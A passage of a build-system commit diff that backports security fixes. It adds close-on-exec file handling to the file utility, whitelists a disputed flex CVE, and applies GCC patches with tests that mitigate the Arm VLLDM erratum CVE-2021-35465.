+index b66510c6..d6c485fe 100644
+--- a/src/funcs.c
++++ b/src/funcs.c
+@@ -27,7 +27,7 @@
+ #include "file.h"
+
+ #ifndef lint
+-FILE_RCSID("@(#)$File: funcs.c,v 1.115 2020/02/20 15:50:20 christos Exp $")
++FILE_RCSID("@(#)$File: funcs.c,v 1.118 2020/12/08 21:26:00 christos Exp $")
+ #endif /* lint */
+
+ #include "magic.h"
+@@ -36,6 +36,9 @@ FILE_RCSID("@(#)$File: funcs.c,v 1.115 2020/02/20 15:50:20 christos Exp $")
+ #include <stdlib.h>
+ #include <string.h>
+ #include <ctype.h>
++#ifdef HAVE_UNISTD_H
++#include <unistd.h> /* for pipe2() */
++#endif
+ #if defined(HAVE_WCHAR_H)
+ #include <wchar.h>
+ #endif
+@@ -783,3 +786,22 @@ file_print_guid(char *str, size_t len, const uint64_t *guid)
+ g->data4[2], g->data4[3], g->data4[4], g->data4[5],
+ g->data4[6], g->data4[7]);
+ }
++
++protected int
++file_pipe_closexec(int *fds)
++{
++#ifdef HAVE_PIPE2
++ return pipe2(fds, O_CLOEXEC);
++#else
++ if (pipe(fds) == -1)
++ return -1;
++ (void)fcntl(fds[0], F_SETFD, FD_CLOEXEC);
++ (void)fcntl(fds[1], F_SETFD, FD_CLOEXEC);
++ return 0;
++#endif
++}
++
++protected int
++file_clear_closexec(int fd) {
++ return fcntl(fd, F_SETFD, 0);
++}
+diff --git a/src/magic.c b/src/magic.c
+index 17a7077d..89f4e16c 100644
+--- a/src/magic.c
++++ b/src/magic.c
+@@ -33,7 +33,7 @@
+ #include "file.h"
+
+ #ifndef lint
+-FILE_RCSID("@(#)$File: magic.c,v 1.112 2020/06/08 19:44:10 christos Exp $")
++FILE_RCSID("@(#)$File: magic.c,v 1.113 2020/12/08 21:26:00 christos Exp $")
+ #endif /* lint */
+
+ #include "magic.h"
+@@ -436,7 +436,7 @@ file_or_fd(struct magic_set *ms, const char *inname, int fd)
+ _setmode(STDIN_FILENO, O_BINARY);
+ #endif
+ if (inname != NULL) {
+- int flags = O_RDONLY|O_BINARY|O_NONBLOCK;
++ int flags = O_RDONLY|O_BINARY|O_NONBLOCK|O_CLOEXEC;
+ errno = 0;
+ if ((fd = open(inname, flags)) < 0) {
+ okstat = stat(inname, &sb) == 0;
+@@ -460,6 +460,9 @@ file_or_fd(struct magic_set *ms, const char *inname, int fd)
+ rv = 0;
+ goto done;
+ }
++#if O_CLOEXEC == 0
++ (void)fcntl(fd, F_SETFD, FD_CLOEXEC);
++#endif
+ }
+
+ if (fd != -1) {
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/flex/flex_2.6.4.bb b/meta/recipes-devtools/flex/flex_2.6.4.bb
index 54e7e01729d..a85c3afc075 100644
--- a/meta/recipes-devtools/flex/flex_2.6.4.bb
+++ b/meta/recipes-devtools/flex/flex_2.6.4.bb
@@ -28,6 +28,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4
UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases"
UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar"
+# Disputed - yes there is stack exhaustion but no bug and it is building the
+# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address
+# https://github.com/westes/flex/issues/414
+CVE_CHECK_WHITELIST += "CVE-2019-6293"
+
inherit autotools gettext texinfo ptest
M4 = "${bindir}/m4"
diff --git a/meta/recipes-devtools/gcc/gcc-10.2.inc b/meta/recipes-devtools/gcc/gcc-10.2.inc
index c0cd8b31d5b..248e0021064 100644
--- a/meta/recipes-devtools/gcc/gcc-10.2.inc
+++ b/meta/recipes-devtools/gcc/gcc-10.2.inc
@@ -70,6 +70,10 @@ SRC_URI = "\
file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \
file://0001-aarch64-Fix-up-__aarch64_cas16_acq_rel-fallback.patch \
file://0001-libatomic-libgomp-libitc-Fix-bootstrap-PR70454.patch \
+ file://0001-CVE-2021-35465.patch \
+ file://0002-CVE-2021-35465.patch \
+ file://0003-CVE-2021-35465.patch \
+ file://0004-CVE-2021-35465.patch \
"
SRC_URI[sha256sum] = "b8dd4368bb9c7f0b98188317ee0254dd8cc99d1e3a18d0ff146c855fe16c1d8c"
diff --git a/meta/recipes-devtools/gcc/gcc/0001-CVE-2021-35465.patch b/meta/recipes-devtools/gcc/gcc/0001-CVE-2021-35465.patch
new file mode 100644
index 00000000000..b9bca49dd88
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc/0001-CVE-2021-35465.patch
@@ -0,0 +1,138 @@
+From 3929bca9ca95de9d35e82ae8828b188029e3eb70 Mon Sep 17 00:00:00 2001
+From: Richard Earnshaw <rearnsha@arm.com>
+Date: Fri, 11 Jun 2021 16:02:05 +0100
+Subject: [PATCH] arm: Add command-line option for enabling CVE-2021-35465
+ mitigation [PR102035]
+
+Add a new option, -mfix-cmse-cve-2021-35465 and document it. Enable it
+automatically for cortex-m33, cortex-m35p and cortex-m55.
+
+gcc:
+ PR target/102035
+ * config/arm/arm.opt (mfix-cmse-cve-2021-35465): New option.
+ * doc/invoke.texi (Arm Options): Document it.
+ * config/arm/arm-cpus.in (quirk_vlldm): New feature bit.
+ (ALL_QUIRKS): Add quirk_vlldm.
+ (cortex-m33): Add quirk_vlldm.
+ (cortex-m35p, cortex-m55): Likewise.
+ * config/arm/arm.c (arm_option_override): Enable fix_vlldm if
+ targetting an affected CPU and not explicitly controlled on
+ the command line.
+
+CVE: CVE-2021-35465
+Upstream-Status: Backport[https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=3929bca9ca95de9d35e82ae8828b188029e3eb70]
+Signed-off-by: Pgowda <pgowda.cve@gmail.com>
+
+---
+ gcc/config/arm/arm-cpus.in | 9 +++++++--
+ gcc/config/arm/arm.c | 9 +++++++++
+ gcc/config/arm/arm.opt | 4 ++++
+ gcc/doc/invoke.texi | 9 +++++++++
+ 4 files changed, 29 insertions(+), 2 deletions(-)
+
+diff --git a/gcc/config/arm/arm.c b/gcc/config/arm/arm.c
+--- a/gcc/config/arm/arm.c 2020-07-22 23:35:17.344384552 -0700
++++ b/gcc/config/arm/arm.c 2021-11-11 20:16:19.761241867 -0800
+@@ -3595,6 +3595,15 @@ arm_option_override (void)
+ fix_cm3_ldrd = 0;
+ }
+
++ /* Enable fix_vlldm by default if required. */
++ if (fix_vlldm == 2)
++ {
++ if (bitmap_bit_p (arm_active_target.isa, isa_bit_quirk_vlldm))
++ fix_vlldm = 1;
++ else
++ fix_vlldm = 0;
++ }
++
+ /* Hot/Cold partitioning is not currently supported, since we can't
+ handle literal pool placement in that case. */
+ if (flag_reorder_blocks_and_partition)
+diff --git a/gcc/config/arm/arm-cpus.in b/gcc/config/arm/arm-cpus.in
+--- a/gcc/config/arm/arm-cpus.in 2020-07-22 23:35:17.340384509 -0700
++++ b/gcc/config/arm/arm-cpus.in 2021-11-11 20:17:01.364573561 -0800
+@@ -190,6 +190,9 @@ define feature quirk_armv6kz
+ # Cortex-M3 LDRD quirk.
+ define feature quirk_cm3_ldrd
+
++# v8-m/v8.1-m VLLDM errata.
++define feature quirk_vlldm
++
+ # Don't use .cpu assembly directive
+ define feature quirk_no_asmcpu
+
+@@ -314,7 +317,7 @@ define fgroup DOTPROD NEON dotprod
+ # architectures.
+ # xscale isn't really a 'quirk', but it isn't an architecture either and we
+ # need to ignore it for matching purposes.
+-define fgroup ALL_QUIRKS quirk_no_volatile_ce quirk_armv6kz quirk_cm3_ldrd xscale quirk_no_asmcpu
++define fgroup ALL_QUIRKS quirk_no_volatile_ce quirk_armv6kz quirk_cm3_ldrd quirk_vlldm xscale quirk_no_asmcpu
+
+ # Architecture entries
+ # format:
+@@ -1492,6 +1495,7 @@ begin cpu cortex-m33
+ architecture armv8-m.main+dsp+fp
+ option nofp remove ALL_FP
+ option nodsp remove armv7em
++ isa quirk_vlldm
+ costs v7m
+ end cpu cortex-m33
+
+@@ -1501,6 +1505,7 @@ begin cpu cortex-m35p
+ architecture armv8-m.main+dsp+fp
+ option nofp remove ALL_FP
+ option nodsp remove armv7em
++ isa quirk_vlldm
+ costs v7m
+ end cpu cortex-m35p
+
+@@ -1508,7 +1513,7 @@ begin cpu cortex-m55
+ cname cortexm55
+ tune flags LDSCHED
+ architecture armv8.1-m.main+mve.fp+fp.dp
+- isa quirk_no_asmcpu
++ isa quirk_no_asmcpu quirk_vlldm
+ costs v7m
+ vendor 41
+ end cpu cortex-m55
+diff --git a/gcc/config/arm/arm.opt b/gcc/config/arm/arm.opt
+--- a/gcc/config/arm/arm.opt 2020-07-22 23:35:17.344384552 -0700
++++ b/gcc/config/arm/arm.opt 2021-11-11 20:16:19.761241867 -0800
+@@ -271,6 +271,10 @@ Target Report Var(fix_cm3_ldrd) Init(2)
+ Avoid overlapping destination and address registers on LDRD instructions
+ that may trigger Cortex-M3 errata.
+
++mfix-cmse-cve-2021-35465
++Target Var(fix_vlldm) Init(2)
++Mitigate issues with VLLDM on some M-profile devices (CVE-2021-35465).
++
+ munaligned-access
+ Target Report Var(unaligned_access) Init(2) Save
+ Enable unaligned word and halfword accesses to packed data.
+diff -upr a/gcc/doc/invoke.texi b/gcc/doc/invoke.texi
+--- a/gcc/doc/invoke.texi 2021-11-11 19:30:56.264523105 -0800
++++ b/gcc/doc/invoke.texi 2021-11-11 20:16:19.769241739 -0800
+@@ -773,6 +773,7 @@ Objective-C and Objective-C++ Dialects}.
+ -mverbose-cost-dump @gol
+ -mpure-code @gol
+ -mcmse @gol
++-mfix-cmse-cve-2021-35465 @gol
+ -mfdpic}
+
+ @emph{AVR Options}
+@@ -21233,6 +21234,14 @@ Use multiply and add/subtract instructio
+
+ Do not use multiply and add/subtract instructions.
+
++@item -mfix-cmse-cve-2021-35465
++@opindex mfix-cmse-cve-2021-35465
++Mitigate against a potential security issue with the @code{VLLDM} instruction
++in some M-profile devices when using CMSE (CVE-2021-365465). This option is
++enabled by default when the option @option{-mcpu=} is used with
++@code{cortex-m33}, @code{cortex-m35p} or @code{cortex-m55}. The option
++@option{-mno-fix-cmse-cve-2021-35465} can be used to disable the mitigation.
++
+ @item -mfdpic
+ @opindex mfdpic
+
diff --git a/meta/recipes-devtools/gcc/gcc/0002-CVE-2021-35465.patch b/meta/recipes-devtools/gcc/gcc/0002-CVE-2021-35465.patch
new file mode 100644
index 00000000000..38d02dc770e
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc/0002-CVE-2021-35465.patch
@@ -0,0 +1,40 @@
+From 574e7950bd6b34e9e2cacce18c802b45505d1d0a Mon Sep 17 00:00:00 2001
+From: Richard Earnshaw <rearnsha@arm.com>
+Date: Fri, 18 Jun 2021 17:16:25 +0100
+Subject: [PATCH] arm: add erratum mitigation to __gnu_cmse_nonsecure_call
+ [PR102035]
+
+Add the recommended erratum mitigation sequence to
+__gnu_cmse_nonsecure_call for use on Armv8-m.main devices. Since this
+is in the library code we cannot know in advance whether the core we
+are running on will be affected by this, so always enable it.
+
+libgcc:
+ PR target/102035
+ * config/arm/cmse_nonsecure_call.S (__gnu_cmse_nonsecure_call):
+ Add vlldm erratum work-around.
+
+CVE: CVE-2021-35465
+Upstream-Status: Backport[https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=574e7950bd6b34e9e2cacce18c802b45505d1d0a]
+Signed-off-by: Pgowda <pgowda.cve@gmail.com>
+
+---
+ libgcc/config/arm/cmse_nonsecure_call.S | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/libgcc/config/arm/cmse_nonsecure_call.S b/libgcc/config/arm/cmse_nonsecure_call.S
+index 00830ade98e..c8e0fbbe665 100644
+--- a/libgcc/config/arm/cmse_nonsecure_call.S
++++ b/libgcc/config/arm/cmse_nonsecure_call.S
+@@ -102,6 +102,11 @@ blxns r4
+ #ifdef __ARM_PCS_VFP
+ vpop.f64 {d8-d15}
+ #else
++/* VLLDM erratum mitigation sequence. */
++mrs r5, control
++tst r5, #8 /* CONTROL_S.SFPA */
++it ne
++.inst.w 0xeeb00a40 /* vmovne s0, s0 */
+ vlldm sp /* Lazy restore of d0-d16 and FPSCR. */
+ add sp, sp, #0x88 /* Free space used to save floating point registers. */
+ #endif /* __ARM_PCS_VFP */
diff --git a/meta/recipes-devtools/gcc/gcc/0003-CVE-2021-35465.patch b/meta/recipes-devtools/gcc/gcc/0003-CVE-2021-35465.patch
new file mode 100644
index 00000000000..d87be198669
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc/0003-CVE-2021-35465.patch
@@ -0,0 +1,103 @@
+From 30461cf8dba3d3adb15a125e4da48800eb2b9b8f Mon Sep 17 00:00:00 2001
+From: Richard Earnshaw <rearnsha@arm.com>
+Date: Fri, 18 Jun 2021 17:18:37 +0100
+Subject: [PATCH] arm: fix vlldm erratum for Armv8.1-m [PR102035]
+
+For Armv8.1-m we generate code that emits VLLDM directly and do not
+rely on support code in the library, so emit the mitigation directly
+as well, when required. In this case, we can use the compiler options
+to determine when to apply the fix and when it is safe to omit it.
+
+gcc:
+ PR target/102035
+ * config/arm/arm.md (attribute arch): Add fix_vlldm.
+ (arch_enabled): Use it.
+ * config/arm/vfp.md (lazy_store_multiple_insn): Add alternative to
+ use when erratum mitigation is needed.
+
+CVE: CVE-2021-35465
+Upstream-Status: Backport[https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=30461cf8dba3d3adb15a125e4da48800eb2b9b8f]
+Signed-off-by: Pgowda <pgowda.cve@gmail.com>
+
+---
+ gcc/config/arm/arm.md | 11 +++++++++--
+ gcc/config/arm/vfp.md | 10 +++++++---
+ 2 files changed, 16 insertions(+), 5 deletions(-)
+
+diff -upr a/gcc/config/arm/arm.md b/gcc/config/arm/arm.md
+--- a/gcc/config/arm/arm.md 2020-07-22 23:35:17.344384552 -0700
++++ b/gcc/config/arm/arm.md 2021-11-11 20:33:58.431543947 -0800
+@@ -132,9 +132,12 @@
+ ; TARGET_32BIT, "t1" or "t2" to specify a specific Thumb mode. "v6"
+ ; for ARM or Thumb-2 with arm_arch6, and nov6 for ARM without
+ ; arm_arch6. "v6t2" for Thumb-2 with arm_arch6 and "v8mb" for ARMv8-M
+-; Baseline. This attribute is used to compute attribute "enabled",
++; Baseline. "fix_vlldm" is for fixing the v8-m/v8.1-m VLLDM erratum.
++; This attribute is used to compute attribute "enabled",
+ ; use type "any" to enable an alternative in all cases.
+-(define_attr "arch" "any,a,t,32,t1,t2,v6,nov6,v6t2,v8mb,iwmmxt,iwmmxt2,armv6_or_vfpv3,neon,mve"
++(define_attr "arch" "any, a, t, 32, t1, t2, v6,nov6, v6t2, \
++ v8mb, fix_vlldm, iwmmxt, iwmmxt2, armv6_or_vfpv3, \
++ neon, mve"
+ (const_string "any"))
+
+ (define_attr "arch_enabled" "no,yes"
+@@ -177,6 +180,10 @@
+ (match_test "TARGET_THUMB1 && arm_arch8"))
+ (const_string "yes")
+
++ (and (eq_attr "arch" "fix_vlldm")
++ (match_test "fix_vlldm"))
++ (const_string "yes")
++
+ (and (eq_attr "arch" "iwmmxt2")
+ (match_test "TARGET_REALLY_IWMMXT2"))
+ (const_string "yes")
+diff -upr a/gcc/config/arm/vfp.md b/gcc/config/arm/vfp.md
+--- a/gcc/config/arm/vfp.md 2020-07-22 23:35:17.356384684 -0700
++++ b/gcc/config/arm/vfp.md 2021-11-11 20:33:58.431543947 -0800
+@@ -1703,12 +1703,15 @@
+ (set_attr "type" "mov_reg")]
+ )
+
++;; Both this and the next instruction are treated by GCC in the same
++;; way as a blockage pattern. That's perhaps stronger than it needs
++;; to be, but we do not want accesses to the VFP register bank to be
++;; moved across either instruction.
++
+ (define_insn "lazy_store_multiple_insn"
+- [(set (match_operand:SI 0 "s_register_operand" "+&rk")
+- (post_dec:SI (match_dup 0)))
+- (unspec_volatile [(const_int 0)
+- (mem:SI (post_dec:SI (match_dup 0)))]
+- VUNSPEC_VLSTM)]
++ [(unspec_volatile
++ [(mem:BLK (match_operand:SI 0 "s_register_operand" "rk"))]
++ VUNSPEC_VLSTM)]
+ "use_cmse && reload_completed"
+ "vlstm%?\\t%0"
+ [(set_attr "predicable" "yes")
+@@ -1716,14 +1719,16 @@
+ )
+
+ (define_insn "lazy_load_multiple_insn"
+- [(set (match_operand:SI 0 "s_register_operand" "+&rk")
+- (post_inc:SI (match_dup 0)))
+- (unspec_volatile:SI [(const_int 0)
+- (mem:SI (match_dup 0))]
+- VUNSPEC_VLLDM)]
++ [(unspec_volatile
++ [(mem:BLK (match_operand:SI 0 "s_register_operand" "rk,rk"))]
++ VUNSPEC_VLLDM)]
+ "use_cmse && reload_completed"
+- "vlldm%?\\t%0"
+- [(set_attr "predicable" "yes")
++ "@
++ vscclrm\\t{vpr}\;vlldm\\t%0
++ vlldm\\t%0"
++ [(set_attr "arch" "fix_vlldm,*")
++ (set_attr "predicable" "no")
++ (set_attr "length" "8,4")
+ (set_attr "type" "load_4")]
+ )
+
diff --git a/meta/recipes-devtools/gcc/gcc/0004-CVE-2021-35465.patch b/meta/recipes-devtools/gcc/gcc/0004-CVE-2021-35465.patch
new file mode 100644
index 00000000000..9f7a38ed2e1
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc/0004-CVE-2021-35465.patch
@@ -0,0 +1,304 @@
+From 809330ab8450261e05919b472783bf15e4b000f7 Mon Sep 17 00:00:00 2001
+From: Richard Earnshaw <rearnsha@arm.com>
+Date: Tue, 6 Jul 2021 15:10:18 +0100
+Subject: [PATCH] arm: Add tests for VLLDM mitigation [PR102035]
+
+New tests for the erratum mitigation.
+
+gcc/testsuite:
+ PR target/102035
+ * gcc.target/arm/cmse/mainline/8_1m/soft/cmse-13a.c: New test.
+ * gcc.target/arm/cmse/mainline/8_1m/soft/cmse-7a.c: Likewise.
+ * gcc.target/arm/cmse/mainline/8_1m/soft/cmse-8a.c: Likewise.
+ * gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-7a.c: Likewise.
+ * gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-8a.c: Likewise.
+ * gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-13a.c: Likewise.
+ * gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-7a.c: Likewise.
+ * gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-8a.c: Likewise.
+
+CVE: CVE-2021-35465
+Upstream-Status: Backport[https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=809330ab8450261e05919b472783bf15e4b000f7]
+Signed-off-by: Pgowda <pgowda.cve@gmail.com>
+
+---
+ .../arm/cmse/mainline/8_1m/soft/cmse-13a.c | 31 +++++++++++++++++++
+ .../arm/cmse/mainline/8_1m/soft/cmse-7a.c | 28 +++++++++++++++++
+ .../arm/cmse/mainline/8_1m/soft/cmse-8a.c | 30 ++++++++++++++++++
+ .../cmse/mainline/8_1m/softfp-sp/cmse-7a.c | 27 ++++++++++++++++
+ .../cmse/mainline/8_1m/softfp-sp/cmse-8a.c | 29 +++++++++++++++++
+ .../arm/cmse/mainline/8_1m/softfp/cmse-13a.c | 30 ++++++++++++++++++
+ .../arm/cmse/mainline/8_1m/softfp/cmse-7a.c | 27 ++++++++++++++++
+ .../arm/cmse/mainline/8_1m/softfp/cmse-8a.c | 29 +++++++++++++++++
+ 8 files changed, 231 insertions(+)
+ create mode 100644 gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-13a.c
+ create mode 100644 gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-7a.c
+ create mode 100644 gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-8a.c
+ create mode 100644 gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-7a.c
+ create mode 100644 gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-8a.c
+ create mode 100644 gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-13a.c
+ create mode 100644 gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-7a.c
+ create mode 100644 gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-8a.c
+
+diff --git a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-13a.c b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-13a.c
+--- a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-13a.c 1969-12-31 16:00:00.000000000 -0800
++++ b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-13a.c 2021-11-11 20:38:44.286766084 -0800
+@@ -0,0 +1,31 @@
++/* { dg-do compile } */
++/* { dg-options "-mcmse -mfloat-abi=soft -mfix-cmse-cve-2021-35465" } */
++/* { dg-skip-if "Incompatible float ABI" { *-*-* } { "-mfloat-abi=*" } { "-mfloat-abi=soft" } } */
++
++#include "../../../cmse-13.x"
++
++/* Checks for saving and clearing prior to function call. */
++/* Shift on the same register as blxns. */
++/* { dg-final { scan-assembler "lsrs\t(r\[1,4-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "lsls\t(r\[1,4-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler-not "mov\tr0, r4" } } */
++/* { dg-final { scan-assembler-not "mov\tr2, r4" } } */
++/* { dg-final { scan-assembler-not "mov\tr3, r4" } } */
++/* { dg-final { scan-assembler "push\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler "vlstm\tsp" } } */
++/* Check the right registers are cleared and none appears twice. */
++/* { dg-final { scan-assembler "clrm\t\{(r1, )?(r4, )?(r5, )?(r6, )?(r7, )?(r8, )?(r9, )?(r10, )?(fp, )?(ip, )?APSR\}" } } */
++/* Check that the right number of registers is cleared and thus only one
++ register is missing. */
++/* { dg-final { scan-assembler "clrm\t\{((r\[1,4-9\]|r10|fp|ip), ){9}APSR\}" } } */
++/* Check that no cleared register is used for blxns. */
++/* { dg-final { scan-assembler-not "clrm\t\{\[^\}\]\+(r\[1,4-9\]|r10|fp|ip),\[^\}\]\+\}.*blxns\t\\1" } } */
++/* Check for v8.1-m variant of erratum work-around. */
++/* { dg-final { scan-assembler "vscclrm\t\{vpr\}" } } */
++/* { dg-final { scan-assembler "vlldm\tsp" } } */
++/* { dg-final { scan-assembler "pop\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler-not "vmov" } } */
++/* { dg-final { scan-assembler-not "vmsr" } } */
++
++/* Now we check that we use the correct intrinsic to call. */
++/* { dg-final { scan-assembler "blxns" } } */
+diff --git a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-7a.c b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-7a.c
+--- a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-7a.c 1969-12-31 16:00:00.000000000 -0800
++++ b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-7a.c 2021-11-11 20:38:44.286766084 -0800
+@@ -0,0 +1,28 @@
++/* { dg-do compile } */
++/* { dg-options "-mcmse -mfloat-abi=soft -mfix-cmse-cve-2021-35465" } */
++/* { dg-skip-if "Incompatible float ABI" { *-*-* } { "-mfloat-abi=*" } { "-mfloat-abi=soft" } } */
++
++#include "../../../cmse-7.x"
++
++/* Checks for saving and clearing prior to function call. */
++/* Shift on the same register as blxns. */
++/* { dg-final { scan-assembler "lsrs\t(r\[0-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "lsls\t(r\[0-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "push\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler "vlstm\tsp" } } */
++/* Check the right registers are cleared and none appears twice. */
++/* { dg-final { scan-assembler "clrm\t\{(r0, )?(r1, )?(r2, )?(r3, )?(r4, )?(r5, )?(r6, )?(r7, )?(r8, )?(r9, )?(r10, )?(fp, )?(ip, )?APSR\}" } } */
++/* Check that the right number of registers is cleared and thus only one
++ register is missing. */
++/* { dg-final { scan-assembler "clrm\t\{((r\[0-9\]|r10|fp|ip), ){12}APSR\}" } } */
++/* Check that no cleared register is used for blxns. */
++/* { dg-final { scan-assembler-not "clrm\t\{\[^\}\]\+(r\[0-9\]|r10|fp|ip),\[^\}\]\+\}.*blxns\t\\1" } } */
++/* Check for v8.1-m variant of erratum work-around. */
++/* { dg-final { scan-assembler "vscclrm\t\{vpr\}" } } */
++/* { dg-final { scan-assembler "vlldm\tsp" } } */
++/* { dg-final { scan-assembler "pop\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler-not "vmov" } } */
++/* { dg-final { scan-assembler-not "vmsr" } } */
++
++/* Now we check that we use the correct intrinsic to call. */
++/* { dg-final { scan-assembler "blxns" } } */
+diff --git a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-8a.c b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-8a.c
+--- a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-8a.c 1969-12-31 16:00:00.000000000 -0800
++++ b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/soft/cmse-8a.c 2021-11-11 20:38:44.286766084 -0800
+@@ -0,0 +1,30 @@
++/* { dg-do compile } */
++/* { dg-options "-mcmse -mfloat-abi=soft -mfix-cmse-cve-2021-35465" } */
++/* { dg-skip-if "Incompatible float ABI" { *-*-* } { "-mfloat-abi=*" } { "-mfloat-abi=soft" } } */
++
++#include "../../../cmse-8.x"
++
++/* Checks for saving and clearing prior to function call. */
++/* Shift on the same register as blxns. */
++/* { dg-final { scan-assembler "lsrs\t(r\[2-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "lsls\t(r\[2-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler-not "mov\tr0, r4" } } */
++/* { dg-final { scan-assembler-not "mov\tr1, r4" } } */
++/* { dg-final { scan-assembler "push\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler "vlstm\tsp" } } */
++/* Check the right registers are cleared and none appears twice. */
++/* { dg-final { scan-assembler "clrm\t\{(r2, )?(r3, )?(r4, )?(r5, )?(r6, )?(r7, )?(r8, )?(r9, )?(r10, )?(fp, )?(ip, )?APSR\}" } } */
++/* Check that the right number of registers is cleared and thus only one
++ register is missing. */
++/* { dg-final { scan-assembler "clrm\t\{((r\[2-9\]|r10|fp|ip), ){10}APSR\}" } } */
++/* Check that no cleared register is used for blxns. */
++/* { dg-final { scan-assembler-not "clrm\t\{\[^\}\]\+(r\[2-9\]|r10|fp|ip),\[^\}\]\+\}.*blxns\t\\1" } } */
++/* Check for v8.1-m variant of erratum work-around. */
++/* { dg-final { scan-assembler "vscclrm\t\{vpr\}" } } */
++/* { dg-final { scan-assembler "vlldm\tsp" } } */
++/* { dg-final { scan-assembler "pop\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler-not "vmov" } } */
++/* { dg-final { scan-assembler-not "vmsr" } } */
++
++/* Now we check that we use the correct intrinsic to call. */
++/* { dg-final { scan-assembler "blxns" } } */
+diff --git a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-13a.c b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-13a.c
+--- a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-13a.c 1969-12-31 16:00:00.000000000 -0800
++++ b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-13a.c 2021-11-11 20:38:44.286766084 -0800
+@@ -0,0 +1,30 @@
++/* { dg-do compile } */
++/* { dg-options "-mcmse -mfloat-abi=softfp -mfpu=fpv5-d16 -mfix-cmse-cve-2021-35465" } */
++/* { dg-skip-if "Incompatible float ABI" { *-*-* } { "-mfloat-abi=*" } { "-mfloat-abi=softfp" } } */
++/* { dg-skip-if "Skip these if testing single precision" {*-*-*} {"-mfpu=*-sp-*"} {""} } */
++
++#include "../../../cmse-13.x"
++
++/* Checks for saving and clearing prior to function call. */
++/* Shift on the same register as blxns. */
++/* { dg-final { scan-assembler "lsrs\t(r\[1,4-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "lsls\t(r\[1,4-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler-not "mov\tr0, r4" } } */
++/* { dg-final { scan-assembler-not "mov\tr2, r4" } } */
++/* { dg-final { scan-assembler-not "mov\tr3, r4" } } */
++/* { dg-final { scan-assembler "push\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler "vlstm\tsp" } } */
++/* Check the right registers are cleared and none appears twice. */
++/* { dg-final { scan-assembler "clrm\t\{(r1, )?(r4, )?(r5, )?(r6, )?(r7, )?(r8, )?(r9, )?(r10, )?(fp, )?(ip, )?APSR\}" } } */
++/* Check that the right number of registers is cleared and thus only one
++ register is missing. */
++/* { dg-final { scan-assembler "clrm\t\{((r\[1,4-9\]|r10|fp|ip), ){9}APSR\}" } } */
++/* Check that no cleared register is used for blxns. */
